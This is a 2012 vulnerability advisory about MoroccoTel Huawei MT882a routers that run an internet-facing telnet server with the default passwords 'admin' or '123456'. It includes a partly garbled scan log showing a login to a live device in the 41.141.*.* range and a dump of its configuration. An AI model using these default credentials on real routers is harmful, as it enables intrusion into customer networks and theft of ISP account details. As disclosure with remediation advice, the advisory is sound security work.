MoroccoTel Default Password

Posted Apr 25, 2012
Authored by Jerome Athias

MoroccoTel boxes suffer from an issue where there is a default password that can be used on the telnet server.

tags | exploit
SHA-256 | 15212df8a3a8d8b6ba16ec77025ef5e22d8dacfee6fd2ff769977b33b5b5fd46

Hi,

a "vulnerability" was identified on MoroccoTel Boxes:
a telnet server is running, open to the web, with a default password of
admin (or 123456)

This critical vulnerability can affect the entire network of a country.

Solution: change the default account password or modify the default firmware

NB: a new firmware was released, introducing a cipher on the "PPPoE
password" (one common, publicly available PPPoE account is largely used)

Discovered by NETpeas research team, NETpeas CERT is trying to contact
the ISP

More details:

Password:
telnettry
41.141.*.* -> Response telnet02: ****
Copyright (c) 2001 - 2006 Huawei
MT882a>
***********************************************************
41.141.*.* -> TELNET PASSWORD FOUND: admin

MT882a> show all

RAS version: V100R001B022 MoroccoTel 2010/02/26
System ID: $5.0.152.1(RUE0.C2)3.11.2.151 20110602_V001 [Jun 02 2011
13:54:48]
romRasSize: 1217226
system up time: 2:45:45 (f2cc9 ticks)
bootbase version: VTC_SPI1.5| 2011/05/26


Hostname = MT882a
Message = <empty>
ip route mode = Yes
bridge mode = Yes
DHCP setting:
DHCP Mode = Server
Client IP Pool Starting Address = 192.168.1.2
Size of Client IP Pool = 64
Primary DNS Server = 8.8.8.8
Secondary DNS Server = 8.8.4.4
DHCP server leasetime = 86400
TCP/IP Setup:
IP Address = 192.168.1.1
IP Subnet Mask = 255.255.255.0
Rip Direction = None
Version = Rip-1
Multicast = IGMP-v2


RemoteNode = 0
Rem Node Name = ISP-0(ISP)
Encapsulation = PPPoE
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 8/35
IP Routing mode= Yes
Bridge mode = No
PPP Username = <snip>

PPP Password
41.141.*.* -> = *******
PPP Username_ext2 =
PPP Password_ext2 =
Service name =
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = Yes
Multicast = None
Default Route node = Yes

RemoteNode = 1
Rem Node Name = ISP-1
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel
41.141.1.9 -> Port 80 open
41.141.*.* -> active = Yes
VPI/VCI value = 0/35
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0

41.141.*.* -> IP address assignment type = Dynamic

41.141.*.* -> SUA = No
Multicast = None
Default Route node = No

RemoteNode = 2
Rem Node Name = ISP-2
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 0/32
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 3
Rem Node Name = ISP-3
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 8/32
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 4
Rem Node Name = ISP-4
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 8/81
IP Routing mode= No
Bridge mode = Yes
Remote IP
41.141.*.* -> Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 5
Rem Node Name = ISP-5
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 0/100
IP Routing mode= No
Bridge mode = Yes
Remote IP A
41.141.*.* -> ddr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
sMulticast = None

41.141.*.* -> yDefault Route node = No
s
RemoteNode = 6
aRem Node Name = ISP-6t
sEncapsulation = hRFC 1483

Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 1/39
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 7
Rem Node Name = ISP-7
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 0/16
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

MT882a>
RAS version : V100R001B022 MoroccoTel
romRasSize : 1217226
bootbase version : VTC_SPI1.5| 2011/05/26
Product Model : SmartAX

MAC Address : <snip-inclear>

Default Count
41.141.*.* -> ry Code : FF

Boot Module Debug Flag : 00

RomFile Version : 9F

RomFile Checksum : dceb

RAS F/W Checksum : 87b7

SNMP MIB level & OID : 050000000100000002000000030000000400000005

Main Feature Bits : 86

Other Feature Bits :
93 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 13 00 00 00
MT882a>
41.141.*.* -> e
41.141.*.* -> ther config
--------------- NDIS CONFIGURATION BLOCK ----------------
type=1 flags=0001
Board/Chassis:1 Lines/Board:1 Channels/Lines:2 Total Channel:2
task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2
board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0
board-pp (8042c8f0)
804273fc
line-pp (8042c8f4)
8042956c
chann-pp (8042c8f8)
804bf8a4 804bfe34
--------------- BOARD DISPLAY ---------------------------
ID slot# n-line n-chann status line-cfg chann-cfg
00 0 1 2 0001 8042c8bc 8042c8d0
--------------- LINE DISPLAY ---------------------------
ID line# board-id n-chann chann-cfg
00 1 00 2 8042c8d0
--------------- CHANNEL DISPLAY -------------------------
ID chan# line-id board-id address name
00 1 00 00 804bf8a4 enet0
01 2 00 00 804bfe34 enet1
MT882a>


--
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca
Mobile: +212665346454
www.netpeas.com
---------------------------------------------
Stay updated on Security: www.vulnerabilitydatabase.com

"The computer security is an art form. It's the ultimate martial art."
